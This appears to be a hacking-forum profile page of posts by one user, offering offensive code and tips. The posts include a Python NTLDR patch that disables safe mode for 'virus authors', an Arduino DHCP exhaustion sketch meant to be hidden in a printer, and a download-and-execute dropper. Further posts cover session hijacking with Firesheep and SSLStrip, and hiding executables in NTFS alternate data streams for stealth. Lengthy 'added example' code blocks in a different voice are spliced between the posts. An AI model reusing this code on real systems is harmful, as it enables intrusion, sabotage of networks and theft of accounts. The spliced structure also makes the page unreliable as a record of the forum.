sablefoxx

Dedicated Members
  • Posts: 572
  • Days Won: 1

About sablefoxx

  • Birthday 01/01/1911

Profile Information

  • Gender
    Male
  • Location
    /Milkyway/Terran System/Earth/
  • Interests
    Greatest Albums:
    - The Dark Side of the Moon - Pink Floyd
    - Give Up - The Postal Service
    - The Classics - Ratatat


  1. @ibegreengoblin -- I sent you a PM; I'd also recommend modifying your post here to be a little less incriminating.
  2. sablefoxx

    Pyblade

    Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently? It allows you to copy other people's Dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c

    And if you're feeling a bit evil, disable safe mode (XP/2k3):

        # Python 2.x code
        import os
        import mmap

        def patchNtldr(ntldr='C:\\ntldr'):
            # Open the loader read/write in binary mode and map the whole file
            with open(ntldr, 'r+b') as loader:
                size = os.path.getsize(ntldr)
                mapped = mmap.mmap(loader.fileno(), size)
                mapped.seek(1915)           # Jump to offset
                mapped.write_byte('\x90')   # Overwrite three bytes with NOP (0x90), whee!
                mapped.write_byte('\x90')
                mapped.write_byte('\x90')
                mapped.flush()              # Push the change back to disk
                mapped.close()

        if __name__ == '__main__':
            patchNtldr()
  3. Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
  4. Yeah, that doesn't seem like a very mean virus. You can probably just boot into safe mode and modify the Group Policies or regkeys to regain access. On a side note to virus authors: don't forget to disable safe mode by patching the NTLDR like so:

        # Python 2.x code
        import os
        import mmap

        def patchNtldr(ntldr='C:\\ntldr'):
            # Open the loader read/write in binary mode and map the whole file
            with open(ntldr, 'r+b') as loader:
                size = os.path.getsize(ntldr)
                mapped = mmap.mmap(loader.fileno(), size)
                mapped.seek(1915)           # Jump to offset
                mapped.write_byte('\x90')   # Overwrite three bytes with NOP (0x90), whee!
                mapped.write_byte('\x90')
                mapped.write_byte('\x90')
                mapped.flush()              # Push the change back to disk
                mapped.close()

        if __name__ == '__main__':
            patchNtldr()
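The NTLDR snippets in posts 2 and 4 seek to a hard-coded offset and write NOPs blind, so a patch written for one loader build will silently corrupt any other. Below is an added example (my code, not sablefoxx's or Py~Blade's) of the same mmap technique with the check a practitioner wants: the existing bytes must match what the patch expects before anything is written, and a backup is kept. The 32-byte sample file, the offset 12 and the byte values are constructed for the demo and have nothing to do with NTLDR's actual layout.

```python
"""Offset patching via mmap, with a sanity check before the write.

Added example, not code from the original post. The sample file, offset and
byte values below are constructed for the demo, not taken from NTLDR.
"""
import mmap
import os
import shutil
import tempfile


class PatchError(Exception):
    """The target does not look like the binary this patch was written for."""


def patch_bytes(path, offset, expected, replacement, backup=True):
    """Replace `expected` at `offset` with `replacement`, in place, via mmap.

    Returns the bytes that were overwritten. Raises PatchError instead of
    writing if the lengths differ, the offset is out of range, or the bytes
    already at the offset are not `expected` (wrong file, wrong version, or
    already patched).
    """
    if len(expected) != len(replacement):
        raise PatchError("replacement must be the same length as the bytes it replaces")
    size = os.path.getsize(path)
    if size == 0 or offset < 0 or offset + len(expected) > size:
        raise PatchError("offset %d is outside a %d-byte file" % (offset, size))
    with open(path, "r+b") as fh:
        mapped = mmap.mmap(fh.fileno(), size)
        try:
            current = mapped[offset:offset + len(expected)]
            if current != expected:
                raise PatchError("bytes at %d are %s, expected %s"
                                 % (offset, current.hex(), expected.hex()))
            if backup:
                shutil.copy2(path, path + ".bak")   # taken only once we know we will write
            mapped[offset:offset + len(replacement)] = replacement
            mapped.flush()
        finally:
            mapped.close()
    return current


def demo():
    """Patch a constructed 32-byte 'binary', then show the guard refusing a second run."""
    blob = bytearray(32)
    blob[12:15] = b"\x75\x03\xcc"        # constructed: three bytes standing in for the branch to neutralise
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "wb") as fh:
            fh.write(blob)
        overwritten = patch_bytes(path, 12, b"\x75\x03\xcc", b"\x90\x90\x90")
        with open(path, "rb") as fh:
            patched = fh.read()
        try:
            patch_bytes(path, 12, b"\x75\x03\xcc", b"\x90\x90\x90")
            refused = False
        except PatchError:
            refused = True                  # the bytes are already 90 90 90, so the guard fires
        return overwritten, patched[12:15], refused
    finally:
        for p in (path, path + ".bak"):
            if os.path.exists(p):
                os.remove(p)


if __name__ == "__main__":
    print(demo())
```

The backup is written only after the expected-bytes check passes, so a refused run leaves no stray `.bak` behind; the returned original bytes are what you would feed back in to reverse the patch.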
  5. DHCP attacks are fun. I recently wrote an Arduino sketch to perform DHCP exhaustion attacks on (Ethernet) networks. Thinking about hiding it in a network printer or something.

        /***
         * Net~nade: The hand held DHCP grenade (exhaustion attack)
         * Written by: Sablefoxx
         */
        #include <Ethernet.h>
        #include <EthernetDHCP.h>

        /* Function Prototypes */
        void requestIp(byte mac[]);
        void displayMac(byte mac[]);
        const char* addressToString(const uint8_t* ip);

        /* Setup */
        void setup() {
          Serial.begin(9600);
        }

        /* Main Loop: walk the last two MAC bytes so every request carries a new client address */
        void loop() {
          byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01};
          for (int hexFour = 0; hexFour < 256; ++hexFour) {
            for (int hexFive = 0; hexFive < 256; ++hexFive) {
              requestIp(mac);
              EthernetDHCP.maintain();
              mac[5]++;              // Next 5th hex value
            }
            mac[4]++;                // Increment 4th hex value
            mac[5] = 0x01;           // Reset 5th hex value
          }
        }

        void requestIp(byte mac[]) {
          Serial.print("[*] Attempting to obtain DHCP lease...");
          EthernetDHCP.begin(mac);   // Blocking DISCOVER/REQUEST using this client MAC
          const byte* ip = EthernetDHCP.ipAddress();
          const byte* gateway = EthernetDHCP.gatewayIpAddress();
          Serial.println("got it!");
          Serial.print("[+] From ");
          Serial.print(addressToString(gateway));
          Serial.print(" got ");
          Serial.print(addressToString(ip));
          Serial.print(" with ");
          displayMac(mac);
          Serial.print("\n");
        }

        void displayMac(byte mac[]) {
          for (int index = 0; index <= 5; ++index) {
            if (mac[index] < 0x10) {
              Serial.print("0");     // Zero-pad single-digit bytes
            }
            Serial.print(mac[index], HEX);
            if (index < 5) {
              Serial.print(":");
            }
          }
        }

        const char* addressToString(const uint8_t* ip) {
          static char buf[16];       // "255.255.255.255" plus terminator
          sprintf(buf, "%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3]);
          return buf;
        }
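The Net~nade sketch leans on the EthernetDHCP library to do the actual protocol work, so the post never shows what a DHCPDISCOVER looks like on the wire or why walking the MAC bytes exhausts the pool. The following added example (my code, not the sketch or any library on the page) builds RFC 2131 DHCPDISCOVER messages for a run of client hardware addresses, parses them back, and counts the distinct `chaddr` values a server would have to reserve leases for. It runs offline; the base MAC and transaction IDs are constructed, and putting the bytes on the wire (UDP broadcast from port 68 to 255.255.255.255:67) is left out.

```python
"""DHCPDISCOVER messages for an exhaustion run, built and parsed offline.

Added example, not code from the original post. The base MAC and xid values
are constructed for the demo; nothing here touches the network.
"""
import struct

BOOTREQUEST = 1
MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_MSG_TYPE, OPT_CLIENT_ID, OPT_END = 53, 61, 255
DHCPDISCOVER = 1


def build_discover(mac, xid):
    """Return the bytes of a DHCPDISCOVER (RFC 2131) for a client with hardware address `mac`."""
    if len(mac) != 6:
        raise ValueError("Ethernet MAC must be 6 bytes")
    # Fixed BOOTP header: op, htype=1 (Ethernet), hlen=6, hops, xid, secs, flags (broadcast bit set)
    header = struct.pack("!BBBBIHH", BOOTREQUEST, 1, 6, 0, xid, 0, 0x8000)
    header += b"\x00" * 16                 # ciaddr, yiaddr, siaddr, giaddr: all zero on DISCOVER
    header += bytes(mac) + b"\x00" * 10    # chaddr, padded to 16 bytes
    header += b"\x00" * 192                # sname (64) + file (128), unused
    options = MAGIC_COOKIE
    options += bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
    options += bytes([OPT_CLIENT_ID, 7, 1]) + bytes(mac)   # client id: type 1 (Ethernet) + MAC
    options += bytes([OPT_END])
    return header + options


def parse_discover(packet):
    """Pull op, xid, chaddr and the option dict back out of a DHCP packet."""
    op, htype, hlen, hops, xid, secs, flags = struct.unpack("!BBBBIHH", packet[:12])
    chaddr = packet[28:28 + hlen]
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == 0:                      # pad option has no length byte
            i += 1
            continue
        length = packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": op, "xid": xid, "chaddr": chaddr, "options": opts}


def exhaustion_batch(base_mac, count, xid_seed=0x1000):
    """Yield (mac, packet) pairs, walking the two low MAC bytes the way the sketch does."""
    prefix = bytes(base_mac[:4])
    for n in range(count):
        mac = prefix + bytes([(n >> 8) & 0xFF, n & 0xFF])
        yield mac, build_discover(mac, xid_seed + n)


def distinct_clients(packets):
    """Number of distinct chaddr values: each one costs the server a lease from its pool."""
    return len({parse_discover(p)["chaddr"] for p in packets})


if __name__ == "__main__":
    batch = list(exhaustion_batch(b"\xde\xad\xbe\xef\x01\x01", 600))
    print(len(batch[0][1]), "bytes per DISCOVER;", distinct_clients(p for _, p in batch), "distinct clients")
```

A server keys its offers on `chaddr` (and the client-identifier option when present), which is why the sketch gets a fresh lease for every MAC it invents; the DISCOVER itself is the same 253 bytes each time, only those two fields change.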
  6. You shouldn't make system calls if possible (they're evil); it's actually easy to download files in pure Python. Here's a quick example:

        # Python 2.x code
        import urllib
        from subprocess import Popen

        path = 'C:\\file.exe'                      # Local path
        url = 'http://remote-server.com/file.exe'  # Remote path

        connection = urllib.urlopen(url)
        remoteFile = connection.read()
        connection.close()

        try:
            localFile = open(path, 'wb')   # Binary mode, so the executable is written byte for byte
            localFile.write(remoteFile)
            localFile.close()
            Popen(path)                    # Execute whatever "path" points to
        except IOError:
            print '***** OMFG ERROR: Location is not writable %s *****\n' % path

    Using sys.argv you can even make the 'url' a command line argument.
  7. sablefoxx

    Pyblade

    I haven't had much time to develop Py~Blade recently, so here is the current source code. It's got a few bugs, but feel free to hack it up. This isn't an official release, but feel free to post patches or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn Python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz
  8. http://www.instructables.com/id/Remove-U3-from-flash-drive/
  9. sablefoxx

    Firesheep

    Note: a lot of the time, even when the credentials are sent over HTTPS, the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective: even if you can't get the user/password you can still gain access to an account.
  10. sablefoxx

    Firesheep

    If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box; just hook the encryption DLL.
  11. sablefoxx

    Firesheep

    1. Facebook sends the cookie in clear text even if you log in via SSL.
    2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip to get around that.

    Also look into using Hamster/Ferret; it can attack all sites and not just a predefined list (and it's almost as easy to use).
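Posts 9 and 11 describe the exposure Firesheep relies on: the login goes over HTTPS but the session cookie is issued without the Secure attribute, so the browser sends it on every plain http:// request and anyone on the same network can replay it. The added example below (my code, not the post's or Firesheep's) is the check a site owner or tester would run against the server's Set-Cookie headers: it parses each header and reports cookies that will travel in clear text (no Secure) and cookies readable by injected script (no HttpOnly). The headers are constructed samples, not captured from any real site.

```python
"""Audit Set-Cookie headers for the clear-text exposure session hijacking relies on.

Added example, not code from the original posts. SAMPLE_HEADERS are constructed.
"""


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attrs); attribute names are lower-cased."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True   # flag attributes become True
    return name.strip(), value, attrs


def audit_cookies(set_cookie_headers):
    """Return [(cookie_name, [problems])] for every cookie missing a transport or script guard."""
    findings = []
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        problems = []
        if "secure" not in attrs:
            problems.append("no Secure flag: sent on every http:// request, sniffable on the LAN")
        if "httponly" not in attrs:
            problems.append("no HttpOnly flag: readable by injected script")
        if problems:
            findings.append((name, problems))
    return findings


def hijackable(set_cookie_headers):
    """Cookie names a passive sniffer on the same network can capture and replay."""
    return [parse_set_cookie(h)[0] for h in set_cookie_headers
            if "secure" not in parse_set_cookie(h)[2]]


# Constructed sample response headers; the values are placeholders, not real tokens.
SAMPLE_HEADERS = [
    "sessionid=8f3a0c1d2e; Path=/; HttpOnly",                  # login was HTTPS, cookie still leaks over http://
    "csrftoken=91ab; Path=/",                                  # neither guard
    "sid=9c1e77d4; Path=/; Secure; HttpOnly; SameSite=Lax",    # what a session cookie should look like
    "prefs=dark; Path=/; Secure",                              # confidential on the wire, but script-readable
]


if __name__ == "__main__":
    for name, problems in audit_cookies(SAMPLE_HEADERS):
        print(name)
        for problem in problems:
            print("   ", problem)
    print("replayable by a sniffer:", hijackable(SAMPLE_HEADERS))
```

The Secure flag is the property a sniffer, or SSLStrip downgrading the page to http://, cannot get around: the browser simply never sends a Secure cookie over a plain connection. SSLStrip can still capture whatever the user types into the downgraded page, which is why the flag belongs alongside HSTS rather than instead of it.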
  12. sablefoxx

    Pyblade

    I'm hoping not to have to use AV-Kill and instead just hide everything. Killing processes is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams, they work like so:

        E:\>touch test.txt
        E:\>echo hello world >> test.txt
        E:\>cat test.txt
        hello world

        E:\>dir test.txt
         Volume in drive E is RAID_ARRAY
         Volume Serial Number is 0000-0000

         Directory of E:\

        10/20/2010  10:35 AM                14 test.txt
                       1 File(s)             14 bytes
                       0 Dir(s)  7,143,783,653,376 bytes free

        E:\>touch test.txt:hidden.txt
        E:\>echo this is the hidden file >> test.txt:hidden.txt
        E:\>dir test.txt
         Volume in drive E is RAID_ARRAY
         Volume Serial Number is 0000-0000

         Directory of E:\

        10/20/2010  10:36 AM                14 test.txt
                       1 File(s)             14 bytes
                       0 Dir(s)  7,143,783,653,376 bytes free

        E:\>cat test.txt
        hello world
        E:\>cat test.txt:hidden.txt
        this is the hidden file
        E:\>

    Notice the file size does not change and the file isn't listed using 'dir' and cannot be viewed by enabling hidden/system file viewing. :)
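The transcript above shows the attacker's side of alternate data streams: write to `file:stream`, and neither the reported size nor a plain `dir` changes. The added example below (my code, not Py~Blade's) does the same from Python and adds the defender's side: enumerating every `$DATA` stream on a file through the Win32 `FindFirstStreamW`/`FindNextStreamW` API (Vista and later; `dir /r` reads the same data), which is how a hidden stream is actually found. Only NTFS has streams, so on other platforms `list_streams` reports just the unnamed default stream; the temp file and the `hidden.txt` payload are constructed for the demo.

```python
"""Create, read and enumerate NTFS alternate data streams.

Added example, not code from the original post. Stream enumeration needs
Windows (kernel32 FindFirstStreamW); elsewhere only the default stream exists.
"""
import ctypes
import os
import shutil
import tempfile


def write_stream(path, stream, data):
    """Write `data` into the named stream `path:stream` (NTFS only; elsewhere ':' is just a filename character)."""
    with open("%s:%s" % (path, stream), "wb") as fh:
        fh.write(data)


def read_stream(path, stream):
    """Read the named stream back."""
    with open("%s:%s" % (path, stream), "rb") as fh:
        return fh.read()


def list_streams(path):
    """Return [(stream_name, size)] for every $DATA stream on `path`.

    Names come back as '::$DATA' for the default stream and ':name:$DATA' for
    alternates. On non-Windows hosts there is no ADS concept, so only the
    default stream and its size are reported.
    """
    if os.name != "nt":
        return [("::$DATA", os.path.getsize(path))]

    class WIN32_FIND_STREAM_DATA(ctypes.Structure):
        _fields_ = [("StreamSize", ctypes.c_longlong),            # LARGE_INTEGER
                    ("cStreamName", ctypes.c_wchar * (260 + 36))]  # WCHAR[MAX_PATH + 36]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_uint, ctypes.c_void_p, ctypes.c_uint]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.FindClose.argtypes = [ctypes.c_void_p]

    INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
    ERROR_HANDLE_EOF = 38
    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)   # 0 = FindStreamInfoStandard
    if handle == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    streams = []
    try:
        while True:
            streams.append((data.cStreamName, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                err = ctypes.get_last_error()
                if err == ERROR_HANDLE_EOF:
                    break
                raise ctypes.WinError(err)
    finally:
        k32.FindClose(handle)
    return streams


def hidden_streams(path):
    """Names of streams other than the default: anything listed here is invisible to a plain `dir`."""
    return [name for name, _ in list_streams(path) if name != "::$DATA"]


def demo():
    """Mirror the transcript: write test.txt, hide a second stream in it, compare sizes and streams."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "test.txt")
    try:
        with open(path, "wb") as fh:
            fh.write(b"hello world\r\n")                    # 13 bytes, constructed
        before = os.path.getsize(path)
        if os.name == "nt":
            write_stream(path, "hidden.txt", b"this is the hidden file\r\n")
        after = os.path.getsize(path)                       # unchanged: size reports the default stream only
        return before, after, hidden_streams(path)
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

On an NTFS volume `demo()` returns `(13, 13, [':hidden.txt:$DATA'])`: the size `dir` shows is untouched, but the stream walk names the payload, which is the check to run on a suspect file rather than trusting the directory listing.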
  13. sablefoxx

    Pyblade

    (Sorry about the long update interval; I recently moved 1,784 miles to attend college.) Lots of new features in the upcoming build, plus I made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thanks for the tip.